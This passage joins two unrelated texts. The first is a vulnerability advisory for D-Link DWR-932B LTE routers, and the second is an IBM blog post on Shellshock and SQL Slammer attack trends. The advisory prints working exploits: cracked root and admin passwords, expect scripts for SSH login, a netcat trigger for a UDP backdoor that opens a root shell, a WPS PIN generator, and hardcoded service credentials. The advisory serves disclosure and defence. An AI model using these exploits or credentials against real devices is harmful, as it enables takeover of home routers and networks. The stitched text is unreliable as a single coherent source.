mail:*:16270:0:99999:7:::
news:*:16270:0:99999:7:::
uucp:*:16270:0:99999:7:::
proxy:*:16270:0:99999:7:::
www-data:*:16270:0:99999:7:::
backup:*:16270:0:99999:7:::
list:*:16270:0:99999:7:::
irc:*:16270:0:99999:7:::
gnats:*:16270:0:99999:7:::
diag:*:16270:0:99999:7:::
nobody:*:16270:0:99999:7:::
messagebus:!:16270:0:99999:7:::
avahi:!:16270:0:99999:7:::
[email protected]:~$

Using john to crack the hashes:

[email protected]:~$ john -show shadow+passwd
admin:admin:admin:/:/bin/sh
root:1234:16270:0:99999:7:::

2 password hashes cracked, 0 left
[email protected]:~$

Results:

- admin has password admin
- root has password 1234

Working exploit for admin:

[email protected]:~$ cat quanta-ssh-default-password-admin
#!/usr/bin/expect -f

set timeout 3
spawn ssh [email protected]
expect "password: $ "
send "admin\r"
interact
[email protected]:~$ ./quanta-ssh-default-password-admin
spawn ssh [email protected]
[email protected]'s password:
[email protected]:~$ id
uid=168(admin) gid=168(admin) groups=168(admin)
[email protected]:~$

Alternatively, you can fetch it at
https://pierrekim.github.io/advisories/quanta-ssh-default-password-admin.

Working exploit for root:

[email protected]:~$ cat quanta-ssh-default-password-root
#!/usr/bin/expect -f

set timeout 3
spawn ssh [email protected]
expect "password: $ "
send "1234\r"
interact
[email protected]:~$ ./quanta-ssh-default-password-root
spawn ssh [email protected]
[email protected]'s password:
[email protected]:~# id
uid=168(root) gid=168(root) groups=168(root)
[email protected]:~#

Alternatively, you can fetch it at
https://pierrekim.github.io/advisories/quanta-ssh-default-password-root.

## Details - Backdoor

A backdoor is present inside the `/bin/appmgr` program. By sending a
specific string in UDP to the router, an authentication-less telnet
server will start if a telnetd daemon is not already running.

In `/bin/appmgr`, a thread listens to 0.0.0.0:39889 (UDP) and waits
for commands.

If a client sends "HELODBG" to the router, the router will execute
`/sbin/telnetd -l /bin/sh`, allowing to access without authentication
to the router as root.

When using IDA, we can see the backdoor is located in the main
function (line 369):

[please visit the HTML version at
https://pierrekim.github.io/blog/2016-09-28-dlink-dwr-932b-lte-routers-vulnerabilities.html
to see the image]

Working PoC :

[email protected]:~$ echo -ne "HELODBG" | nc -u 192.168.1.1 39889
Hello
^C
[email protected]:~$ telnet 192.168.1.1
Trying 192.168.1.1...
Connected to 192.168.1.1.
Escape character is '^]'.

OpenEmbedded Linux homerouter.cpe

msm 20141210 homerouter.cpe

/ # id
uid=0(root) gid=0(root)
/ # exit
Connection closed by foreign host.
[email protected]:~$

## Details - Default WPS PIN

Wi-Fi Protected Setup(WPS) is a standard for easy and secure
establishment of a wireless home network, as defined in the
documentation provided in the router (help.html).

By default, the PIN for the WPS system is ever 28296607. It is, in
fact, hardcoded in the /bin/appmgr program:

This PIN can be found in the HostAP configuration too, and, using the
information leak, in the HTTP APIs of the router:

[email protected]:~# ps -a|grep hostap
1006 root 0:00 hostapd /var/wifi/ar6k0.conf
1219 root 0:00 grep hostap
[email protected]:~# cat /var/wifi/ar6k0.conf
[...]
ap_pin=28296607
[...]

## Details - Weak WPS PIN Generation - with a reverse-engineered algorithm

An user can use the webinterface to generate a temporary PIN for the
WPS system (low probability as the 28296607 WPS PIN is provided by
default).

The PIN generated by the router is weak as it is generated using this
"strange" reverse-engineered algorithm:

[email protected]:~$ cat quanta-wps-gen.c

#include <stdio.h>
#include <stdlib.h>
#include <time.h>

int main(int argc,
char **argv,
char **envp)
{
unsigned int i0, i1;
int i2;

/* the seed is the current time of the router, which uses NTP... */
srand(time(0));

i0 = rand() % 10000000;
if (i0 <= 999999)
i0 += 1000000;
i1 = 10 * i0;
i2 = (10 - (i1 / 10000 % 10 + i1 / 1000000 % 10 + i1 / 100 % 10 + 3 *
(i1 / 100000 % 10 + 10 * i0 / 10000000 % 10 + i1 / 1000 %
10 + i1 / 10 % 10))
% 10) % 10 + 10 * i0;

printf("%d\n", i2 );

return (0);
}

[email protected]:~$ gcc -o dlink-wps-gen quanta-wps-gen.c
[email protected]:~$ ./dlink-wps-gen
97329329
[email protected]:~$

You can fetch this program at
https://pierrekim.github.io/advisories/quanta-wps-gen.c.

Using `srand(time(0))` as a seed is a bad idea because an attacker,
knowing the current date as `time(0)` returns the current date in an
integer value, can just generate the valid WPS PIN. The Router uses
NTP so is likely to have a correct timestamp configured. It's trivial
for an attacker to generate valid WPS PIN suites and bruteforce them.

For the curious reader, the original algorithm in the firmware is:

[please visit the HTML version at
https://pierrekim.github.io/blog/2016-09-28-dlink-dwr-932b-lte-routers-vulnerabilities.html
to see this long content]

## Details - Leaking No-IP account (?):

The file `/etc/inadyn-mt.conf` (for a dyndns client) contains an user
and a hardcoded password:

--log_file /usr/inadyn_srv.log
--forced_update_period 6000
--username alex_hung
--password 641021
--dyndns_system [email protected]
--alias test.no-ip.com

## Details - Multiple vulnerabilities in the HTTP daemon (qmiweb)

The HTTP daemon `/bin/qmiweb` is full of vulnerabilities.

You can see my precedent researches about a router model using a
similar firmware:

- https://pierrekim.github.io/blog/2016-04-04-quanta-lte-routers-vulnerabilities.html#webinterface-information-leak
- https://pierrekim.github.io/blog/2016-04-04-quanta-lte-routers-vulnerabilities.html#rce-1
- https://pierrekim.github.io/blog/2016-04-04-quanta-lte-routers-vulnerabilities.html#rce-2
- https://pierrekim.github.io/blog/2016-04-04-quanta-lte-routers-vulnerabilities.html#arbitrary-file-browsing-using-the-http-daemon
- https://pierrekim.github.io/blog/2016-04-04-quanta-lte-routers-vulnerabilities.html#arbitrary-file-reading-using-the-http-daemon

Adapting the exploits is left as exercises for the reader 🙂

## Details - Remote FOTA (Firmware Over The Air)

The credentials to contact the FOTA server are hardcoded in the
`/sbin/fotad` binary, as shown with this IDA screenshot:

[please visit the HTML version at
https://pierrekim.github.io/blog/2016-09-28-dlink-dwr-932b-lte-routers-vulnerabilities.html
to see the image]

The function sub_CAAC contains the credentials as base64-strings, used
to retrieve the firmware.

It's notable the FOTA daemon tries to retrieve the firmware over
HTTPS. But at the date of the writing, the SSL certificate for
https://qdp:[email protected]/qdh/ispname/2031/appliance.xml is
invalid for 1.5 year.

[please visit the HTML version at
https://pierrekim.github.io/blog/2016-09-28-dlink-dwr-932b-lte-routers-vulnerabilities.html
to see the image]

The user/password combinations are:

qdpc:qdpc
qdpe:qdpe
qdp:qdp

## Details - Bad security practices:

- From `/etc/init.d/start_appmgr`, you will read "strange" shell
commands executed as root, like:

if [ -f /sbin/netcfg ]; then
echo -n "chmod 777 netcfg"
chmod 777 /sbin/netcfg
fi
if [ -f /bin/QNetCfg ]; then
echo -n "chmod 777 QNetCfg"
chmod 777 /bin/QNetCfg
fi

I have no idea why the vendor needs to chmod 777 files located in /bin/.

## Details - Security removed in UPnP

UPnP allows to add firewall rules dynamically. Because of the security
risks involved, generally there are restrictions in place to avoid
dangerous new firewall rules from an unstrusted LAN client.

Insecurity in IPnP was hype 10 years ago (in 2006). The security level
of the UPNP program (miniupnp) in this router is volountarily lowered
as shown below and allows an attacker located in the LAN area to add
Port forwarding from the Internet to other clients located in the LAN:

The `/var/miniupnpd.conf` is generated by the `/bin/appmgr` program:

[please visit the HTML version at
https://pierrekim.github.io/blog/2016-09-28-dlink-dwr-932b-lte-routers-vulnerabilities.html
to see the image]

It will generate the /var/miniupnpd.conf file:

ext_ifname=rmnet0
listening_ip=bridge0
port=2869
enable_natpmp=yes
enable_upnp=yes
bitrate_up=14000000
bitrate_down=14000000
secure_mode=no # "secure" mode : when enabled, UPnP client
are allowed to add mappings only to their IP.
presentation_url=http://192.168.1.1
system_uptime=yes
notify_interval=30
upnp_forward_chain=MINIUPNPD
upnp_nat_chain=MINIUPNPD

There is no restriction about the UPnP permission rules in the
configuration file, contrary to common usage in UPnP where it is
advised to only allow redirection of port above 1024:

Normal config file:

# UPnP permission rules
# (allow|deny) (external port range) ip/mask (internal port range)
# A port range is <min port>-<max port> or <port> if there is only
# one port in the range.
# ip/mask format must be nn.nn.nn.nn/nn
# it is advised to only allow redirection of port above 1024
# and to finish the rule set with "deny 0-65535 0.0.0.0/0 0-65535"
allow 1024-65535 192.168.0.0/24 1024-65535
deny 0-65535 0.0.0.0/0 0-65535

In the configuration of the vulnerable router where there are no
permission rules, an attacker can forward everything from the WAN into
the LAN. For example, an attacker can add a forwarding rule in order
to allow traffic from the Internet to local Exchange servers, mail
servers, ftp servers, http servers, database servers... In fact, this
lack of security allows a local user to forward whatever they want
from the Internet into the LAN.

## Personal notes

As the router has a sizable memory (168 MB), a decent CPU and good
free space (235 MB) with complete toolkits installed by default (sshd,
proxy (/bin/tinyproxy -c /var/tproxy.conf), tcpdump ...), I advise
users to trash their routers because it's trivial for an attacker to
use this router as an attack vector (ie: hosting a sniffing tool, LAN
hacking, active MiTM tool, spamming zombie).

- From my tests, it is possible to overwrite the firmware with a
custom (backdoored) firmware. Generating a valid backdoored firmware
is left as an exercise for the reader, but with all these
vulnerabilities present in the default firmware, I don't think it is
worth making the effort.

## Vendor Response

Customers with questions should contact their local/regional D-Link
support offices for the latest information.

## Report Timeline

* Dec 04, 2015: Vulnerabilities found by Pierre Kim in Quanta routers.
* Apr 04, 2016: A public advisory about Quanta routers is sent to
security mailing lists.
* Jun 09, 2016: Pierre Kim is contacted by Gianni Carabelli about
Dlink DWR-932 router's similarities to Quanta routers.
* Jun 14, 2016: Pierre Kim thanks Gianni Carabelli and says he will
contact Dlink.
* Jun 15, 2016: Dlink is contacted about vulnerabilities in the
DWR-932 router (=~ 20 vulns).
* Jun 16, 2016: Dlink Security Incident Response Team (William Brown)
acknowledges the receipt of the report and says they will provide
further updates.
* Jul 09, 2016: Pierre asks for updates.
* Jul 09, 2016: Dlink says they will have correction by July 15.
* Jul 19, 2016: Pierre asks for updates.
* Aug 19, 2016: Pierre asks for updates.
* Sep 12, 2016: Pierre asks for updates and says he will soon release
an advisory as 90 days have passed without news.
* Sep 12, 2016: [email protected] is contacted to get pieces of advice
about the disclosure.
* Sep 13, 2016: CERT recommends to try to contact D-link and to
publish the advisory.
* Sep 13, 2016: Dlinks says they don't have a schedule for a firmware
release. Customers who have questions should contact their
local/regional D-Link support offices for the latest information.
support.dlink.com will be updated in the next 24 hours.
* Sep 28, 2016: A public advisory is sent to security mailing lists.

## Credits

These vulnerabilities were found by Pierre Kim (@PierreKimSec).

I would like to thank Gianni Carabelli who found this router and
thought it was very similar to the previous backdoored Quanta routers.

## References

https://pierrekim.github.io/advisories/2016-dlink-0x00.txt

https://pierrekim.github.io/blog/2016-09-28-dlink-dwr-932b-lte-routers-vulnerabilities.html

https://www.linkedin.com/pulse/rooting-dlink-dwr-923-4g-router-gianni-carabelli

## Disclaimer

This advisory is licensed under a Creative Commons Attribution
Non-Commercial Share-Alike 3.0 License:
http://creativecommons.org/licenses/by-nc-sa/3.0/

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1

iQIcBAEBCgAGBQJX6qMQAAoJEMQ+Dtp9ky28YaoQALOfDQtF2gYqqLHVBADCVZRC
pBvCNWHrfEcHbMr0bWVvTGQ9/sOjmX+D76GWs4fc/Jl2REORrcg6GR0QM5L0N1O8
GWgLH2O82RR/YweXtNXaIhkZGizFALlmMxav9Pey/FzAYMajCnaSiodyaTrD5+B1
1dBRp//zfNhQ5cTl70baRdTLhzZaNBMKkyBHjJ+uYuP/0itBcYak7OhpqyAzYkF8
s8vyjbTjsG/An19N3jLLDemVLlQvgMTHcqIwvu+FW1Gpx6q39izyZAXv+iXxIUtW
qW+cfMfRooqTo6wGSuH/NO5dfFRdvMIsoVE5GMZqJTcPg2SXbZNdsRQSUrwTV2T0
uHMZO1xMg6WWez6/OaRnGvveSkAPlR0v5KIoyH7nw3Gfg4V63GxCPgrguKUBbMXV
e2cc3ixPOD74UTyIHdqROmDwebHVcHV2tPphFJJRLXQ8WPTB8aJIJEVU82tCZSoh
Uot+B1rorXzTXEjRPoxqO9kuxYj5ZtVVUJPn8NA2Bm284lolDUYbq8qwAeH1X3MI
Fd9bQ+R4CsKDKx1vWGu5uMATqk1VQoRnERDIbvngkR5/vjZtl2soMViHcDV4nqxl
k9lohd8q7BjcPWVkFadFHKvfLv9lHrXdxMTPv9Wug1VOYRlm1GzVh7F7jT+zi2a8
2ikFUEGjc5+RXNQLLiZF
=z06Q
-----END PGP SIGNATURE-----


Exploit Files ≈ Packet Storm

Ready for me to go old school? How about SQL Slammer-level old school? More than 13 years after it was first found scurrying around the internet, the SQL Slammer worm can still be found propagating in the wild, albeit minimally, according to IBM Managed Security Services (MSS) data.

But why does such an old threat keep making the rounds more than a decade after its discovery? Some older threats never die because they’re easy to exploit. There’s always the chance that a vulnerable system can be compromised by tested and true bugs.

Shellshock Surge

While SQL Slammer is a dated threat that only affected Microsoft SQL server 2000, we have much more serious and widespread threats following in its footsteps.

Last Saturday marked the two-year anniversary of one of the most infamous bugs of 2014, Shellshock. A recent surge in attacks observed by IBM Managed Security Services suggested the threat is still prevalent.

From Zero Day to Present Day

A 20-year-old vulnerability (CVE-2014-6271) in the GNU Bash shell, which is widely used on Linux, Solaris and Mac OS systems, sparked the mobilization of attacks known as Shellshock beginning in late September 2014. This first vulnerability gave way to the disclosure of several additional vulnerabilities affecting the UNIX Shell within a short period (CVE-2014-7186 and CVE-2014-7187), at which point many realized that this was a threat to be reckoned with.

Right at the onset, we observed a significant increase in focused attacks leveraging these vulnerabilities — over 2,000 security events within 24 hours of the Shellshock bug disclosure. To get an idea of the magnitude of this activity, there were just over 7,500 Shellshock security events for the entire month of August 2016, according to IBM MSS data.

When a zero-day vulnerability surfaces, especially a high-profile one that can affect many systems, the corresponding exploit is usually disclosed promptly. With Shellshock, an exploit targeting the first vulnerability was publicly disclosed a mere 28 hours after the zero-day vulnerability emerged.

As news of this vulnerability and its ease of exploitation spread, the number of attackers opting to leverage and exploit it increased tremendously. Attacks came in waves from different source IPs and originating countries, rising in quantity every hour.

Shocking Numbers

As though in anticipation of its anniversary, Shellshock attack activity recently surged to levels not seen since 2015. As of Sept. 22, the month of September accounted for more than 26 percent of the total activity recorded in 2016.

A little over 70 percent of the attack traffic originated in the U.S., whereas another 18 percent comes from Australia. Top targets of these attacks, according to IBM MSS data, include organizations located in U.S. (26 percent), Japan (18 percent), India (16 percent) and Brazil (11 percent).

Shellshock anniversary

Retrospective Perspective

Before Shellshock had us scrambling to patch our systems in 2014, we were running for the hills because of another vulnerability. Heartbleed, which affected OpenSSL, a popular open-source protocol, was all over the news.

Heartbleed enabled attackers to remotely exploit a vulnerability to read system memory contents without needing to log on and authenticate a valid identity to a remote server. Successful exploitation could allow attackers to retrieve private keys, passwords or other sensitive information from servers they were not authorized to access.

Shellshock 2

Although a formidable threat when it first surfaced — IBM MSS data revealed over 1.8 million Heartbleed-based attacks by the end of the first month — Heartbleed failed to exhibit the same staying power as its system-crippling cousin, Shellshock.

As shown in the figure above, in the past year, Heartbleed activity indeed paled in comparison to Shellshock, failing to reach even 15 percent of the total number of Shellshock attacks. Even as Shellshock attacks nosedived in November 2015 and continued to wane as we entered 2016, it still managed to maintain its stamina, averaging nearly 7,900 attacks per month throughout 2016.

Who Is Still Riding the Shellshock Wave?

Per IBM MSS data, as of mid-September, the U.S. is the leading country from which Shellshock attacks originate, making up 71 percent of the total in 2016. Approximately 1,800 unique source IPs based in the U.S. were responsible for these attacks. China is in a distant second, making up 8 percent of the Shellshock attacks, followed by Australia and Italy at 6 percent and 3 percent, respectively.

Shellshock 3

Who Is Still Suffering From Shellshock?

The U.S. is also the leading country in terms of organizations targeted by Shellshock, making up 46 percent of the total in 2016. Although Japan was at the top when the threat first materialized, it ranks second in 2016, making up 24 percent of the total on a global scale.

Shellshock 4

In terms of industries most targeted, the information and communication sector, including telecommunications companies as well as those that provide computer programming and consulting services, topped the list in 2016. They sustained over 46 percent of the Shellshock attacks. This makes sense since many major organizations in this space run Linux-based systems in their IT infrastructure and environments.

Shellshock 5

Financial services ranked second at 26 percent, followed closely by manufacturing in third at 16 percent. The finance sector began adopting Linux-based platforms over a decade ago, with early adopters including the Chicago Mercantile Exchange in 2004 and the New York Stock Exchange in 2007. The pervasiveness of the operating system in this sector makes it an attractive target.

UNIX systems, which employ the Bash shell, are also perhaps more prevalent in manufacturing versus other industries. ICS and SCADA hardware might also have a basic UNIX-like firmware running on the device that can’t be easily updated due to special constraints. That could lead to outdated vulnerable services such as SSH, OpenSSL and Apache running on critical devices.

Additionally, the large discrepancy in Shellshock activity observed in information and communications, financial services and manufacturing versus other industries may point to differences in patching practices among those verticals.

Make It Go Away

We wish we could wave a magic wand and make threats like Shellshock go away. But it’s not so simple, unfortunately. Like stains, some cyberthreats are persistently visible, and Shellshock seems bent on sticking around.

So how do you address this issue? Apply the appropriate update for your system. Failure to apply patches and fixes leaves your organization at risk of Shellshock attacks. Timely patch management is vital in organizations of any size. However, depending on the complexity of your environment, this is easier said than done.

Security intelligence and data analytics tools allow your organization to identify the greatest vulnerabilities and prioritize patching, keeping your systems patched and up to date. Virtual patch technology can provide an additional layer of protection. While vendor patches are a first line of defense, protocol analysis, which is incorporated in IBM Security Network Intrusion Prevention product offerings, can provide an additional layer to protect against these types of attacks. In fact, IBM has been helping to protect customers from Shellshock and similar attacks since 2007.

Let’s hope this upward trend is fleeting, and next year there won’t be any reason to publish an anniversary blog.

To learn more about other older attacks that are still successful, check out the white paper “Beware of Older Cyber Attacks.”

Read the White Paper to learn more about older attacks


Security Intelligence